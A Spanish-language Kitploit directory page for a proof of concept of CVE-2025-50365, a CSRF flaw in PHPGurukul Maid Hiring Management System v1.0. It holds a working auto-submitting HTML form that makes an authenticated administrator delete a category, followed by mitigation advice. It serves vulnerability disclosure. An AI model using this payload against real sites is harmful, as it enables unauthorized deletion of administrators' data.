Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-50365_CSRF_DELETE_CATEGORY-phpgurukul-CVE — PoC para CVE-2025-50365: una vulnerabilidad CSRF en PHPGurukul Maid Hiring Management System que permite la eliminación de categorías de contratación mediante una solicitud de administrador manipulada. | Kitploit
Herramientas/GitHubGitHub/1h3ll/cve-2025-50365_csrf_delete_category-phpgurukul-cve
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y Educación
GitHub1h3ll/cve-2025-50365_csrf_delete_category-phpgurukul-cve

CVE-2025-50365_CSRF_DELETE_CATEGORY-phpgurukul-CVE

PoC para CVE-2025-50365: una vulnerabilidad CSRF en PHPGurukul Maid Hiring Management System que permite la eliminación de categorías de contratación mediante una solicitud de administrador manipulada.

Ver Repositorio
3hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Nombre del proyecto y URL del repositorio: Maid Hiring Management System using PHP and MySQL

Tipo de vulnerabilidad: Falsificación de solicitudes del lado del cliente

Versión(es) afectada(s): v1.0

💣Descripción de la vulnerabilidad: Existe una vulnerabilidad de falsificación de solicitudes entre sitios (CSRF) en el panel de administración del Sistema de Gestión de Contratación de PHPGurukul, que permite a un atacante eliminar categorías de contratación arbitrarias engañando a un administrador autenticado para que visite un sitio malicioso. Esto puede provocar la eliminación de datos y cambios no autorizados a nivel de administrador.

👩‍💻Impacto: Eliminación no autorizada de categorías.

🛜Prueba de concepto (PoC):

  1. Había una funcionalidad de eliminación de categorías donde solo el administrador autenticado podía eliminar categorías. 1
  2. Código HTML para enviar una solicitud GET al endpoint /admin/manage-category.php CSRF-POC
root@kitploit:~
<html>
  <body>
    <form action="http://127.0.0.1/mhms/admin/manage-category.php">
      <input type="hidden" name="delid" value="13" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
  1. Utilice el código HTML y cree una URL maliciosa.
3
  • Después de que el administrador haga clic en el enlace, la categoría será eliminada. 4 5
  • Recomendación: Implementar tokens CSRF en los formularios de administración, aplicar cookies SameSite y validar el origen de la solicitud para prevenir acciones no autorizadas.

    Descargar herramienta